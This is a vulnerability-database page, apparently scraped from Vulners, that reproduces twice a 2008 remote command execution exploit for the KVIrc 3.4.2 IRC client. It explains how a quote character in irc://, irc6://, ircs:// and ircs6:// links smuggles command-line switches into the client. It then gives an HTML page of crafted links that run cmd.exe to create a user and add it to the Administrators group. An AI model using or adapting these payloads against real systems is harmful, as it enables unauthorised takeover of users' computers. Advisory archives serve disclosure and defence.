<ahref='irc6:///"%...">KVIrc 3.4.2 Shiny (uri handler) remote command execu... - vulnerability database | Vulners.com
<ahref='irc6:///"%...">
<ahref='irc6:///"%...">
<ahref='irc6:///"%...">
Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:20910
HistoryNov 24, 2008 - 12:00 a.m.

KVIrc 3.4.2 Shiny &#40;uri handler&#41; remote command execution exploit

2008-11-2400:00:00
vulners.com
4

<!–
KVIrc 3.4.2 Shiny (uri handler) remote command execution exploit
by Nine:Situations:Group::strawdog
Tested against IE8beta/WINxpsp3

software site:
http://www.kvirc.net/?lang=en
description:
"KVIrc is a Multilanguage, graphical IRC-Client for Windows, Linux, Unix and Mac
OS.[…]"

A command line parsing vulnerability exists (or I should say persists…:
http://secunia.com/advisories/25740, fixed or not?) which can be exploited by
passing the '"' char followed by command line switches to 'irc:///', 'irc6:///',
'ircs:///' and 'ircs6:///' urls, ex. this shows the argument list:
irc:///"%20–help%20"
The most interesting one is the -e switch followed by 'run' command, this runs
calc.exe:
irc:///"%20–nosplash%20-e%20"run%20calc"%20"

The following links add a new user on target with admin privileges
–>
<html>
<body>

<a
href='irc:///"%20–nosplash%20-e%20"run%20cmd.exe%20/c%20net%20user%20strawdog%20pass%20/add%20&%20net%20localgroup%20Administrators%20strawdog%20/add"%20"'>Heaven
and Earth are impartial</a><br>

<a
href='irc6:///"%20–nosplash%20-e%20"run%20cmd.exe%20/c%20net%20user%20strawdog%20pass%20/add%20&%20net%20localgroup%20Administrators%20strawdog%20/add"%20"'>They
see the ten thousand things as straw dogs</a><br>

<a
href='ircs:///"%20–nosplash%20-e%20"run%20cmd.exe%20/c%20net%20user%20strawdog%20pass%20/add%20&%20net%20localgroup%20Administrators%20strawdog%20/add"%20"'>The
wise are impartial</a><br>

<a
href='ircs6:///"%20–nosplash%20-e%20"run%20cmd.exe%20/c%20net%20user%20strawdog%20pass%20/add%20&%20net%20localgroup%20Administrators%20strawdog%20/add"%20"'>They
see the people as straw dogs</a><br>

</body>
</html>

url: <!–
KVIrc 3.4.2 Shiny (uri handler) remote command execution exploit
by Nine:Situations:Group::strawdog
Tested against IE8beta/WINxpsp3

software site:
http://www.kvirc.net/?lang=en
description:
"KVIrc is a Multilanguage, graphical IRC-Client for Windows, Linux, Unix and Mac
OS.[…]"

A command line parsing vulnerability exists (or I should say persists…:
http://secunia.com/advisories/25740, fixed or not?) which can be exploited by
passing the '"' char followed by command line switches to 'irc:///', 'irc6:///',
'ircs:///' and 'ircs6:///' urls, ex. this shows the argument list:
irc:///"%20–help%20"
The most interesting one is the -e switch followed by 'run' command, this runs
calc.exe:
irc:///"%20–nosplash%20-e%20"run%20calc"%20"

The following links add a new user on target with admin privileges
–>
<html>
<body>

<a
href='irc:///"%20–nosplash%20-e%20"run%20cmd.exe%20/c%20net%20user%20strawdog%20pass%20/add%20&%20net%20localgroup%20Administrators%20strawdog%20/add"%20"'>Heaven
and Earth are impartial</a><br>

<a
href='irc6:///"%20–nosplash%20-e%20"run%20cmd.exe%20/c%20net%20user%20strawdog%20pass%20/add%20&%20net%20localgroup%20Administrators%20strawdog%20/add"%20"'>They
see the ten thousand things as straw dogs</a><br>

<a
href='ircs:///"%20–nosplash%20-e%20"run%20cmd.exe%20/c%20net%20user%20strawdog%20pass%20/add%20&%20net%20localgroup%20Administrators%20strawdog%20/add"%20"'>The
wise are impartial</a><br>

<a
href='ircs6:///"%20–nosplash%20-e%20"run%20cmd.exe%20/c%20net%20user%20strawdog%20pass%20/add%20&%20net%20localgroup%20Administrators%20strawdog%20/add"%20"'>They
see the people as straw dogs</a><br>

</body>
</html>

original url: http://retrogod.altervista.org/kvirc_342_cmd.html